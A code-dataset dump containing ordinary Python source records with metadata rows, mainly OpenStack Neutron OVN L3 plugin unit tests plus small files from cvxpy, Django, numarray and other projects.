gf.return_value = self.fake_floating_ip
uf.return_value = self.fake_floating_ip_new
self.l3_inst.update_floatingip(self.context, 'id', 'floatingip')
self.l3_inst._ovn.delete_nat_rule_in_lrouter.assert_called_once_with(
'neutron-router-id',
type='dnat_and_snat',
logical_ip='10.0.0.10',
external_ip='192.168.0.10')
expected_ext_ids = {
ovn_const.OVN_FIP_EXT_ID_KEY: self.fake_floating_ip_new['id'],
ovn_const.OVN_REV_NUM_EXT_ID_KEY: '1',
ovn_const.OVN_FIP_PORT_EXT_ID_KEY:
self.fake_floating_ip_new['port_id'],
ovn_const.OVN_ROUTER_NAME_EXT_ID_KEY: utils.ovn_name(
self.fake_floating_ip_new['router_id'])}
self.l3_inst._ovn.add_nat_rule_in_lrouter.assert_called_once_with(
'neutron-new-router-id',
type='dnat_and_snat',
logical_ip='10.10.10.10',
external_ip='192.168.0.10',
external_ids=expected_ext_ids)
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin.get_floatingips')
def test_disassociate_floatingips(self, gfs):
gfs.return_value = [{'id': 'fip-id1',
'floating_ip_address': '192.168.0.10',
'router_id': 'router-id',
'port_id': 'port_id',
'floating_port_id': 'fip-port-id1',
'fixed_ip_address': '10.0.0.10'},
{'id': 'fip-id2',
'floating_ip_address': '192.167.0.10',
'router_id': 'router-id',
'port_id': 'port_id',
'floating_port_id': 'fip-port-id2',
'fixed_ip_address': '10.0.0.11'}]
self.l3_inst.disassociate_floatingips(self.context, 'port_id',
do_notify=False)
delete_nat_calls = [mock.call('neutron-router-id',
type='dnat_and_snat',
logical_ip=fip['fixed_ip_address'],
external_ip=fip['floating_ip_address'])
for fip in gfs.return_value]
self.assertEqual(
len(delete_nat_calls),
self.l3_inst._ovn.delete_nat_rule_in_lrouter.call_count)
self.l3_inst._ovn.delete_nat_rule_in_lrouter.assert_has_calls(
delete_nat_calls, any_order=True)
@mock.patch('neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb.'
'ovn_client.OVNClient.update_router_port')
def test_port_update_postcommit(self, update_rp_mock):
kwargs = {'port': {'device_owner': 'foo'}}
self.l3_inst._port_update(resources.PORT, events.AFTER_UPDATE, None,
**kwargs)
update_rp_mock.assert_not_called()
kwargs = {'port': {'device_owner': constants.DEVICE_OWNER_ROUTER_INTF}}
self.l3_inst._port_update(resources.PORT, events.AFTER_UPDATE, None,
**kwargs)
update_rp_mock.assert_called_once_with(kwargs['port'], if_exists=True)
@mock.patch('neutron.plugins.ml2.plugin.Ml2Plugin.update_port_status')
@mock.patch('neutron.plugins.ml2.plugin.Ml2Plugin.update_port')
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_ports')
def test_update_router_gateway_port_bindings_active(
self, mock_get_port, mock_updt_port, mock_updt_status):
fake_host = 'fake-host'
fake_router = 'fake-router'
fake_port_id = 'fake-port-id'
mock_get_port.return_value = [{
'id': fake_port_id,
'status': constants.PORT_STATUS_DOWN}]
self.l3_inst.update_router_gateway_port_bindings(
fake_router, fake_host)
# Assert that the port is being bound
expected_update = {'port': {portbindings.HOST_ID: fake_host}}
mock_updt_port.assert_called_once_with(
mock.ANY, fake_port_id, expected_update)
# Assert that the port status is being set to ACTIVE
mock_updt_status.assert_called_once_with(
mock.ANY, fake_port_id, constants.PORT_STATUS_ACTIVE)
@mock.patch('neutron.plugins.ml2.plugin.Ml2Plugin.update_port_status')
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_ports')
def test_update_router_gateway_port_bindings_down(
self, mock_get_port, mock_updt_status):
fake_port_id = 'fake-port-id'
mock_get_port.return_value = [{
'id': fake_port_id,
'status': constants.PORT_STATUS_ACTIVE}]
self.l3_inst.update_router_gateway_port_bindings(None, None)
# Assert that the port status is being set to DOWN
mock_updt_status.assert_called_once_with(
mock.ANY, fake_port_id, constants.PORT_STATUS_DOWN)
def test_schedule_unhosted_gateways_no_gateways(self):
self.get_a_ctx_mock_p.stop()
self.nb_idl().get_unhosted_gateways.return_value = []
self.l3_inst.schedule_unhosted_gateways()
self.nb_idl().update_lrouter_port.assert_not_called()
def test_schedule_unhosted_gateways(self):
self.get_a_ctx_mock_p.stop()
unhosted_gws = ['lrp-foo-1', 'lrp-foo-2', 'lrp-foo-3']
chassis_mappings = {
'chassis1': ['physnet1'],
'chassis2': ['physnet1'],
'chassis3': ['physnet1']}
chassis = ['chassis1', 'chassis2', 'chassis3']
self.sb_idl().get_chassis_and_physnets.return_value = (
chassis_mappings)
self.sb_idl().get_gateway_chassis_from_cms_options.return_value = (
chassis)
self.nb_idl().get_unhosted_gateways.return_value = unhosted_gws
# 1. port has 2 gateway chassis
# 2. port has only chassis2
# 3. port is not bound
existing_port_bindings = [
['chassis1', 'chassis2'],
['chassis2'],
[]]
self.nb_idl().get_gateway_chassis_binding.side_effect = (
existing_port_bindings)
# for 1. port schedule untouched, add only 3'rd chassis
# for 2. port master scheduler somewhere else
# for 3. port schedule all
self.mock_schedule.side_effect = [
['chassis1', 'chassis2', 'chassis3'],
['chassis1', 'chassis2', 'chassis3'],
['chassis3', 'chassis2', 'chassis1']]
self.l3_inst.schedule_unhosted_gateways()
self.mock_candidates.assert_has_calls([
mock.call(mock.ANY,
chassis_physnets=chassis_mappings,
cms=chassis)] * 3)
self.mock_schedule.assert_has_calls([
mock.call(self.nb_idl(), self.sb_idl(),
'lrp-foo-1', [], ['chassis1', 'chassis2']),
mock.call(self.nb_idl(), self.sb_idl(),
'lrp-foo-2', [], ['chassis2']),
mock.call(self.nb_idl(), self.sb_idl(),
'lrp-foo-3', [], [])])
# make sure that for second port master chassis stays untouched
self.nb_idl().update_lrouter_port.assert_has_calls([
mock.call('lrp-foo-1',
gateway_chassis=['chassis1', 'chassis2', 'chassis3']),
mock.call('lrp-foo-2',
gateway_chassis=['chassis2', 'chassis1', 'chassis3']),
mock.call('lrp-foo-3',
gateway_chassis=['chassis3', 'chassis2', 'chassis1'])])
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_network')
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_port')
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_subnet')
@mock.patch('neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb.'
'ovn_client.OVNClient._get_router_ports')
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin.get_router')
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin.add_router_interface')
def test_add_router_interface_need_to_frag_enabled(self, ari, gr, grps,
gs, gp, gn):
config.cfg.CONF.set_override(
'ovn_emit_need_to_frag', True, group='ovn')
router_id = 'router-id'
interface_info = {'port_id': 'router-port-id'}
ari.return_value = self.fake_router_interface_info
gr.return_value = self.fake_router_with_ext_gw
gs.return_value = self.fake_subnet
gn.return_value = self.fake_network
self.fake_router_port['device_owner'] = (
constants.DEVICE_OWNER_ROUTER_GW)
gp.return_value = self.fake_router_port
self.l3_inst.add_router_interface(self.context, router_id,
interface_info)
# Make sure that the "gateway_mtu" option was set to the router port
fake_router_port_assert = self.fake_router_port_assert
fake_router_port_assert['gateway_chassis'] = mock.ANY
fake_router_port_assert['options'] = {
ovn_const.OVN_ROUTER_PORT_GW_MTU_OPTION:
str(self.fake_network['mtu'])}
self.l3_inst._ovn.add_lrouter_port.assert_called_once_with(
**fake_router_port_assert)
self.l3_inst._ovn.set_lrouter_port_in_lswitch_port.\
assert_called_once_with(
'router-port-id', 'lrp-router-port-id', is_gw_port=True,
lsp_address=ovn_const.DEFAULT_ADDR_FOR_LSP_WITH_PEER)
self.l3_inst._ovn.add_nat_rule_in_lrouter.assert_called_once_with(
'neutron-router-id', logical_ip='10.0.0.0/24',
external_ip='192.168.1.1', type='snat')
self.bump_rev_p.assert_called_with(
self.admin_context, self.fake_router_port,
ovn_const.TYPE_ROUTER_PORTS)
class OVNL3ExtrarouteTests(test_l3_gw.ExtGwModeIntTestCase,
test_l3.L3NatDBIntTestCase,
test_extraroute.ExtraRouteDBTestCaseBase):
# TODO(lucasagomes): Ideally, this method should be moved to a base
# class which all tests classes in networking-ovn inherits from but,
# this base class doesn't seem to exist for now so we need to duplicate
# it here
def _start_mock(self, path, return_value, new_callable=None):
patcher = mock.patch(path, return_value=return_value,
new_callable=new_callable)
patch = patcher.start()
self.addCleanup(patcher.stop)
return patch
def setUp(self):
plugin = 'neutron.tests.unit.extensions.test_l3.TestNoL3NatPlugin'
l3_plugin = ('neutron.services.ovn_l3.plugin.OVNL3RouterPlugin')
service_plugins = {'l3_plugin_name': l3_plugin}
# For these tests we need to enable overlapping ips
cfg.CONF.set_default('allow_overlapping_ips', True)
cfg.CONF.set_default('max_routes', 3)
ext_mgr = test_extraroute.ExtraRouteTestExtensionManager()
super(test_l3.L3BaseForIntTests, self).setUp(
plugin=plugin, ext_mgr=ext_mgr,
service_plugins=service_plugins)
revision_plugin.RevisionPlugin()
l3_gw_mgr = test_l3_gw.TestExtensionManager()
test_extensions.setup_extensions_middleware(l3_gw_mgr)
self.l3_inst = directory.get_plugin(plugin_constants.L3)
self._start_mock(
'neutron.services.ovn_l3.plugin.OVNL3RouterPlugin._ovn',
new_callable=mock.PropertyMock,
return_value=fake_resources.FakeOvsdbNbOvnIdl())
self._start_mock(
'neutron.services.ovn_l3.plugin.OVNL3RouterPlugin._sb_ovn',
new_callable=mock.PropertyMock,
return_value=fake_resources.FakeOvsdbSbOvnIdl())
self._start_mock(
'neutron.scheduler.l3_ovn_scheduler.'
'OVNGatewayScheduler._schedule_gateway',
return_value='hv1')
self._start_mock(
'neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb.ovn_client.'
'OVNClient.get_candidates_for_scheduling',
return_value=[])
self._start_mock(
'neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb.ovn_client.'
'OVNClient._get_v4_network_of_all_router_ports',
return_value=[])
self._start_mock(
'neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb.ovn_client.'
'OVNClient.update_floatingip_status',
return_value=None)
self._start_mock(
'neutron.common.ovn.utils.get_revision_number',
return_value=1)
self.setup_notification_driver()
# Note(dongj): According to bug #1657693, status of an unassociated
# floating IP is set to DOWN. Revise expected_status to DOWN for related
# test cases.
def test_floatingip_update(
self, expected_status=constants.FLOATINGIP_STATUS_DOWN):
super(OVNL3ExtrarouteTests, self).test_floatingip_update(
expected_status)
def test_floatingip_update_to_same_port_id_twice(
self, expected_status=constants.FLOATINGIP_STATUS_DOWN):
super(OVNL3ExtrarouteTests, self).\
test_floatingip_update_to_same_port_id_twice(expected_status)
def test_floatingip_update_subnet_gateway_disabled(
self, expected_status=constants.FLOATINGIP_STATUS_DOWN):
super(OVNL3ExtrarouteTests, self).\
test_floatingip_update_subnet_gateway_disabled(expected_status)
# Test function _subnet_update of L3 OVN plugin.
def test_update_subnet_gateway_for_external_net(self):
super(OVNL3ExtrarouteTests, self). \
test_update_subnet_gateway_for_external_net()
self.l3_inst._ovn.add_static_route.assert_called_once_with(
'neutron-fake_device', ip_prefix='0.0.0.0/0', nexthop='120.0.0.2')
self.l3_inst._ovn.delete_static_route.assert_called_once_with(
'neutron-fake_device', ip_prefix='0.0.0.0/0', nexthop='120.0.0.1')
def test_router_update_gateway_upon_subnet_create_max_ips_ipv6(self):
super(OVNL3ExtrarouteTests, self). \
test_router_update_gateway_upon_subnet_create_max_ips_ipv6()
add_static_route_calls = [
mock.call(mock.ANY, ip_prefix='0.0.0.0/0', nexthop='10.0.0.1'),
mock.call(mock.ANY, ip_prefix='::/0', nexthop='2001:db8::')]
self.l3_inst._ovn.add_static_route.assert_has_calls(
add_static_route_calls, any_order=True)
| 51.198044 | 79 | 0.640318 | 11,264 | 83,760 | 4.35245 | 0.043679 | 0.033288 | 0.038347 | 0.036593 | 0.85832 | 0.827663 | 0.796883 | 0.778261 | 0.75358 | 0.734447 | 0 | 0.025498 | 0.248949 | 83,760 | 1,635 | 80 | 51.229358 | 0.753831 | 0.030349 | 0 | 0.653873 | 0 | 0 | 0.223927 | 0.123404 | 0 | 0 | 0 | 0.000612 | 0.0939 | 1 | 0.037697 | false | 0 | 0.015764 | 0 | 0.056888 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
9c06b321637de0985d2c8ea5ab3e2543e2b615de | 69 | py | Python | util/__init__.py | zyxia1009/OadTR | ec6e4dafcb465719e80cbf39dcd2099e51927d51 | [
"MIT"
] | 53 | 2021-06-21T14:31:54.000Z | 2022-03-30T14:37:49.000Z | util/__init__.py | zyxia1009/OadTR | ec6e4dafcb465719e80cbf39dcd2099e51927d51 | [
"MIT"
] | 15 | 2021-06-23T06:06:12.000Z | 2022-03-25T14:30:30.000Z | util/__init__.py | zyxia1009/OadTR | ec6e4dafcb465719e80cbf39dcd2099e51927d51 | [
"MIT"
] | 9 | 2021-06-27T04:29:56.000Z | 2022-03-29T07:25:53.000Z | from .logger import *
from .loss import *
from .eval_utils import * | 23 | 25 | 0.724638 | 10 | 69 | 4.9 | 0.6 | 0.408163 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.188406 | 69 | 3 | 25 | 23 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
9c15234603f7eecb5bde992db9e730db517bfe40 | 161 | py | Python | articles/views.py | lsdlab/dangan | 1d0238d9b83d6d5e42d6f21ac43fa37c81bb34b7 | [
"MIT"
] | 32 | 2017-06-04T13:33:45.000Z | 2021-09-15T10:47:42.000Z | articles/views.py | lsdlab/awesome_coffice | 1d0238d9b83d6d5e42d6f21ac43fa37c81bb34b7 | [
"MIT"
] | 2 | 2018-01-19T08:10:50.000Z | 2018-08-24T02:06:09.000Z | articles/views.py | lsdlab/awesome_coffice | 1d0238d9b83d6d5e42d6f21ac43fa37c81bb34b7 | [
"MIT"
] | 17 | 2017-06-05T04:00:07.000Z | 2019-02-26T07:29:13.000Z | from django.shortcuts import render
# Create your views here.
def articles(request):
return render(request, 'articles/articles.html', {'title': 'articles'})
| 23 | 73 | 0.745342 | 20 | 161 | 6 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.124224 | 161 | 6 | 74 | 26.833333 | 0.851064 | 0.142857 | 0 | 0 | 0 | 0 | 0.257353 | 0.161765 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
9c596b48e817e4de3d5deb15f9ed27bbbe2f812c | 93 | py | Python | tests/core/test_import.py | njgheorghita/devcon-iv-ethpm | 3cbd1dd64fdbfb787f89cd369acb6f3d36893817 | [
"MIT"
] | 4 | 2018-11-01T12:17:09.000Z | 2018-11-01T13:58:27.000Z | tests/core/test_import.py | njgheorghita/devcon-iv-ethpm | 3cbd1dd64fdbfb787f89cd369acb6f3d36893817 | [
"MIT"
] | null | null | null | tests/core/test_import.py | njgheorghita/devcon-iv-ethpm | 3cbd1dd64fdbfb787f89cd369acb6f3d36893817 | [
"MIT"
] | null | null | null | def test_import():
import devcon_iv_ethpm # noqa: F401
import web3
import ethpm
| 18.6 | 40 | 0.688172 | 13 | 93 | 4.692308 | 0.692308 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.057971 | 0.258065 | 93 | 4 | 41 | 23.25 | 0.826087 | 0.107527 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 1 | 0 | 1.25 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
9c7b715b7c8b109e14a58beb7f440e7e6dc3caf9 | 662 | py | Python | Lib/site-packages/numarray/fft/__init__.py | raychorn/svn_Python-2.5.1 | 425005b1b489ba44ec0bb989e077297e8953d9be | [
"PSF-2.0"
] | null | null | null | Lib/site-packages/numarray/fft/__init__.py | raychorn/svn_Python-2.5.1 | 425005b1b489ba44ec0bb989e077297e8953d9be | [
"PSF-2.0"
] | null | null | null | Lib/site-packages/numarray/fft/__init__.py | raychorn/svn_Python-2.5.1 | 425005b1b489ba44ec0bb989e077297e8953d9be | [
"PSF-2.0"
] | null | null | null | """
Discrete Fourier Transforms - FFT.py
The underlying code for these functions is an f2c translated and modified
version of the FFTPACK routines.
fft(a, n=None, axis=-1)
inverse_fft(a, n=None, axis=-1)
real_fft(a, n=None, axis=-1)
inverse_real_fft(a, n=None, axis=-1)
hermite_fft(a, n=None, axis=-1)
inverse_hermite_fft(a, n=None, axis=-1)
fftnd(a, s=None, axes=None)
inverse_fftnd(a, s=None, axes=None)
real_fftnd(a, s=None, axes=None)
inverse_real_fftnd(a, s=None, axes=None)
fft2d(a, s=None, axes=(-2,-1))
inverse_fft2d(a, s=None, axes=(-2, -1))
real_fft2d(a, s=None, axes=(-2,-1))
inverse_real_fft2d(a, s=None, axes=(-2, -1))
"""
from FFT import *
| 28.782609 | 73 | 0.697885 | 128 | 662 | 3.492188 | 0.28125 | 0.035794 | 0.107383 | 0.178971 | 0.704698 | 0.704698 | 0.630872 | 0.163311 | 0 | 0 | 0 | 0.032646 | 0.120846 | 662 | 22 | 74 | 30.090909 | 0.735395 | 0.959215 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
92d870bf9400de7752db1e28ba92a9518d2841ca | 9,518 | py | Python | cvxpy/tests/test_constraints.py | quantopian/cvxpy | 7deee4d172470aa8f629dab7fead50467afa75ff | [
"Apache-2.0"
] | 5 | 2017-08-31T01:37:00.000Z | 2022-03-24T04:23:09.000Z | cvxpy/tests/test_constraints.py | quantopian/cvxpy | 7deee4d172470aa8f629dab7fead50467afa75ff | [
"Apache-2.0"
] | null | null | null | cvxpy/tests/test_constraints.py | quantopian/cvxpy | 7deee4d172470aa8f629dab7fead50467afa75ff | [
"Apache-2.0"
] | 6 | 2017-02-09T19:37:07.000Z | 2021-01-07T00:17:54.000Z | """
Copyright 2017 Steven Diamond
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from cvxpy.expressions.variables import Variable
from cvxpy.constraints.second_order import SOC
from cvxpy.tests.base_test import BaseTest
import numpy as np
import sys
PY2 = sys.version_info < (3, 0)
class TestConstraints(BaseTest):
""" Unit tests for the expression/expression module. """
def setUp(self):
self.a = Variable(name='a')
self.b = Variable(name='b')
self.x = Variable(2, name='x')
self.y = Variable(3, name='y')
self.z = Variable(2, name='z')
self.A = Variable(2, 2, name='A')
self.B = Variable(2, 2, name='B')
self.C = Variable(3, 2, name='C')
def test_constr_str(self):
"""Test string representations of the constraints.
"""
constr = self.x <= self.x
self.assertEqual(repr(constr), "LeqConstraint(%s, %s)" % (repr(self.x), repr(self.x)))
constr = self.x <= 2*self.x
self.assertEqual(repr(constr), "LeqConstraint(%s, %s)" % (repr(self.x), repr(2*self.x)))
constr = 2*self.x >= self.x
self.assertEqual(repr(constr), "LeqConstraint(%s, %s)" % (repr(self.x), repr(2*self.x)))
def test_eq_constraint(self):
"""Test the EqConstraint class.
"""
constr = self.x == self.z
self.assertEqual(constr.name(), "x == z")
self.assertEqual(constr.size, (2, 1))
# self.assertItemsEqual(constr.variables().keys(), [self.x.id, self.z.id])
# Test value and dual_value.
assert constr.dual_value is None
assert constr.value is None
self.x.save_value([2,2])
self.z.save_value([2,2])
assert constr.value
self.x.save_value([3,3])
assert not constr.value
self.x.value = [2, 1]
self.z.value = [2, 2]
assert not constr.value
self.assertItemsAlmostEqual(constr.violation, [0, 1])
self.assertItemsAlmostEqual(constr.residual.value, [0, 1])
self.z.value = [2, 1]
assert constr.value
self.assertItemsAlmostEqual(constr.violation, [0, 0])
self.assertItemsAlmostEqual(constr.residual.value, [0, 0])
with self.assertRaises(Exception) as cm:
(self.x == self.y)
self.assertEqual(str(cm.exception), "Incompatible dimensions (2, 1) (3, 1)")
# Test copy with args=None
copy = constr.copy()
self.assertTrue(type(copy) is type(constr))
# A new object is constructed, so copy.args == constr.args but copy.args
# is not constr.args.
self.assertEqual(copy.args, constr.args)
self.assertFalse(copy.args is constr.args)
# Test copy with new args
copy = constr.copy(args=[self.A, self.B])
self.assertTrue(type(copy) is type(constr))
self.assertTrue(copy.args[0] is self.A)
self.assertTrue(copy.args[1] is self.B)
def test_leq_constraint(self):
"""Test the LeqConstraint class.
"""
constr = self.x <= self.z
self.assertEqual(constr.name(), "x <= z")
self.assertEqual(constr.size, (2, 1))
# Test value and dual_value.
assert constr.dual_value is None
assert constr.value is None
self.x.save_value([1,1])
self.z.save_value([2,2])
assert constr.value
self.x.save_value([3,3])
assert not constr.value
# self.assertItemsEqual(constr.variables().keys(), [self.x.id, self.z.id])
self.x.value = [2, 1]
self.z.value = [2, 0]
assert not constr.value
self.assertItemsAlmostEqual(constr.violation, [0, 1])
self.assertItemsAlmostEqual(constr.residual.value, [0, 1])
self.z.value = [2, 2]
assert constr.value
self.assertItemsAlmostEqual(constr.violation, [0, 0])
self.assertItemsAlmostEqual(constr.residual.value, [0, 0])
with self.assertRaises(Exception) as cm:
(self.x <= self.y)
self.assertEqual(str(cm.exception), "Incompatible dimensions (2, 1) (3, 1)")
# Test copy with args=None
copy = constr.copy()
self.assertTrue(type(copy) is type(constr))
# A new object is constructed, so copy.args == constr.args but copy.args
# is not constr.args.
self.assertEqual(copy.args, constr.args)
self.assertFalse(copy.args is constr.args)
# Test copy with new args
copy = constr.copy(args=[self.A, self.B])
self.assertTrue(type(copy) is type(constr))
self.assertTrue(copy.args[0] is self.A)
self.assertTrue(copy.args[1] is self.B)
def test_psd_constraint(self):
"""Test the PSD constraint <<.
"""
constr = self.A >> self.B
self.assertEqual(constr.name(), "A >> B")
self.assertEqual(constr.size, (2, 2))
# Test value and dual_value.
assert constr.dual_value is None
assert constr.value is None
self.A.save_value(np.matrix("2 -1; 1 2"))
self.B.save_value(np.matrix("1 0; 0 1"))
assert constr.value
self.assertAlmostEqual(constr.violation, 0)
self.assertAlmostEqual(constr.residual.value, 0)
self.B.save_value(np.matrix("3 0; 0 3"))
assert not constr.value
self.assertAlmostEqual(constr.violation, 1)
self.assertAlmostEqual(constr.residual.value, 1)
with self.assertRaises(Exception) as cm:
(self.x >> self.y)
self.assertEqual(str(cm.exception), "Non-square matrix in positive definite constraint.")
# Test copy with args=None
copy = constr.copy()
self.assertTrue(type(copy) is type(constr))
# A new object is constructed, so copy.args == constr.args but copy.args
# is not constr.args.
self.assertEqual(copy.args, constr.args)
self.assertFalse(copy.args is constr.args)
# Test copy with new args
copy = constr.copy(args=[self.B, self.A])
self.assertTrue(type(copy) is type(constr))
self.assertTrue(copy.args[0] is self.B)
self.assertTrue(copy.args[1] is self.A)
def test_nsd_constraint(self):
"""Test the PSD constraint <<.
"""
constr = self.A << self.B
self.assertEqual(constr.name(), "B >> A")
self.assertEqual(constr.size, (2, 2))
# Test value and dual_value.
assert constr.dual_value is None
assert constr.value is None
self.B.save_value(np.matrix("2 -1; 1 2"))
self.A.save_value(np.matrix("1 0; 0 1"))
assert constr.value
self.A.save_value(np.matrix("3 0; 0 3"))
assert not constr.value
with self.assertRaises(Exception) as cm:
(self.x << self.y)
self.assertEqual(str(cm.exception), "Non-square matrix in positive definite constraint.")
def test_lt(self):
"""Test the < operator.
"""
constr = self.x < self.z
self.assertEqual(constr.name(), "x <= z")
self.assertEqual(constr.size, (2, 1))
with self.assertRaises(Exception) as cm:
(self.x < self.y)
self.assertEqual(str(cm.exception), "Incompatible dimensions (2, 1) (3, 1)")
def test_geq(self):
"""Test the >= operator.
"""
constr = self.z >= self.x
self.assertEqual(constr.name(), "x <= z")
self.assertEqual(constr.size, (2, 1))
with self.assertRaises(Exception) as cm:
(self.y >= self.x)
self.assertEqual(str(cm.exception), "Incompatible dimensions (2, 1) (3, 1)")
def test_gt(self):
"""Test the > operator.
"""
constr = self.z > self.x
self.assertEqual(constr.name(), "x <= z")
self.assertEqual(constr.size, (2, 1))
with self.assertRaises(Exception) as cm:
(self.y > self.x)
self.assertEqual(str(cm.exception), "Incompatible dimensions (2, 1) (3, 1)")
# Test the SOC class.
def test_soc_constraint(self):
exp = self.x + self.z
scalar_exp = self.a + self.b
constr = SOC(scalar_exp, [exp])
self.assertEqual(constr.size, (3, 1))
def test_chained_constraints(self):
"""Tests that chaining constraints raises an error.
"""
error_str = ("Cannot evaluate the truth value of a constraint or "
"chain constraints, e.g., 1 >= x >= 0.")
with self.assertRaises(Exception) as cm:
(self.z <= self.x <= 1)
self.assertEqual(str(cm.exception), error_str)
with self.assertRaises(Exception) as cm:
(self.x == self.z == 1)
self.assertEqual(str(cm.exception), error_str)
if PY2:
with self.assertRaises(Exception) as cm:
(self.z <= self.x).__nonzero__()
self.assertEqual(str(cm.exception), error_str)
else:
with self.assertRaises(Exception) as cm:
(self.z <= self.x).__bool__()
self.assertEqual(str(cm.exception), error_str)
| 37.472441 | 97 | 0.604224 | 1,285 | 9,518 | 4.432685 | 0.128405 | 0.033357 | 0.030021 | 0.056004 | 0.772647 | 0.752107 | 0.735077 | 0.716643 | 0.703125 | 0.6796 | 0 | 0.019846 | 0.264131 | 9,518 | 253 | 98 | 37.620553 | 0.793404 | 0.173986 | 0 | 0.547619 | 0 | 0 | 0.06885 | 0 | 0 | 0 | 0 | 0 | 0.535714 | 1 | 0.065476 | false | 0 | 0.029762 | 0 | 0.10119 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
136bf557859c4302dd1e81901e051d3bc91e5c69 | 252 | py | Python | tests/log.py | git-akihakune/aWaifu-web | bc6774d96b9f3b2ffe673f960786d93c827685a3 | [
"MIT"
] | null | null | null | tests/log.py | git-akihakune/aWaifu-web | bc6774d96b9f3b2ffe673f960786d93c827685a3 | [
"MIT"
] | null | null | null | tests/log.py | git-akihakune/aWaifu-web | bc6774d96b9f3b2ffe673f960786d93c827685a3 | [
"MIT"
] | null | null | null | from .config import verbose
def failed(skk): print("\033[91m[FAILED] \033[00m{}".format(skk))
def passed(skk): print("\033[92m[PASSED] \033[00m{}".format(skk))
def notify(skk):
if verbose:
print("\033[96m[NOTIFY] \033[00m{}".format(skk)) | 28 | 65 | 0.650794 | 39 | 252 | 4.205128 | 0.435897 | 0.146341 | 0.219512 | 0.27439 | 0.219512 | 0 | 0 | 0 | 0 | 0 | 0 | 0.136364 | 0.126984 | 252 | 9 | 66 | 28 | 0.609091 | 0 | 0 | 0 | 0 | 0 | 0.320158 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0.166667 | 0.166667 | 0 | 0.666667 | 0.5 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 6 |
13794bf5de79f4d48d30aaf8063373b9342d0446 | 6,886 | py | Python | meraki_v0/api/security_events.py | zabrewer/dashboard-api-python | bc21b6852e3167dcdf79585928a963efebb9d0ee | [
"MIT"
] | 2 | 2020-01-09T08:35:39.000Z | 2020-01-09T09:23:53.000Z | meraki_v0/api/security_events.py | zabrewer/dashboard-api-python | bc21b6852e3167dcdf79585928a963efebb9d0ee | [
"MIT"
] | null | null | null | meraki_v0/api/security_events.py | zabrewer/dashboard-api-python | bc21b6852e3167dcdf79585928a963efebb9d0ee | [
"MIT"
] | null | null | null | class SecurityEvents(object):
